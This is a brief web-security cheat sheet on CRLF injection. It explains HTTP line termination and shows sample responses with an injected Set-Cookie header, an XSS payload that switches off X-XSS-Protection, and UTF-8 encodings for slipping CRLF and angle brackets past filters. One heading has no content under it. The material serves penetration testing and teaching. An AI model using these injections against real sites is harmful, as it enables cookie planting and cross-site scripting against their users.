CRLF – Carriage Return Line Feed
When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, i.e. the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF.
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They’re used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows, both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
CRLF – Add a cookie
Connection: keep-alive Content-Length: 178 Content-Type: text/html Date: Mon, 09 May 2016 14:47:29 GMT Location: https://www.example.net/[INJECTION STARTS HERE] Set-Cookie: mycookie=myvalue X-Frame-Options: SAMEORIGIN X-Sucuri-ID: 15016 x-content-type-options: nosniff x-xss-protection: 1; mode=block
CRLF – Add a cookie – XSS Bypass
HTTP/1.1 200 OK Date: Tue, 20 Dec 2016 14:34:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 22907 Connection: close X-Frame-Options: SAMEORIGIN Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT ETag: "842fe-597b-54415a5c97a80" Vary: Accept-Encoding X-UA-Compatible: IE=edge Server: NetDNA-cache/2.2 Link: <https://example.com/[INJECTION STARTS HERE] Content-Length:35 X-XSS-Protection:0 23 <svg onload=alert(document.domain)> 0
CRLF – Write HTML
CRLF – Filter Bypass
Using UTF-8 encoding
- %E5%98%8A = %0A = \u560a
- %E5%98%8D = %0D = \u560d
- %E5%98%BE = %3E = \u563e (>)
- %E5%98%BC = %3C = \u563c (<)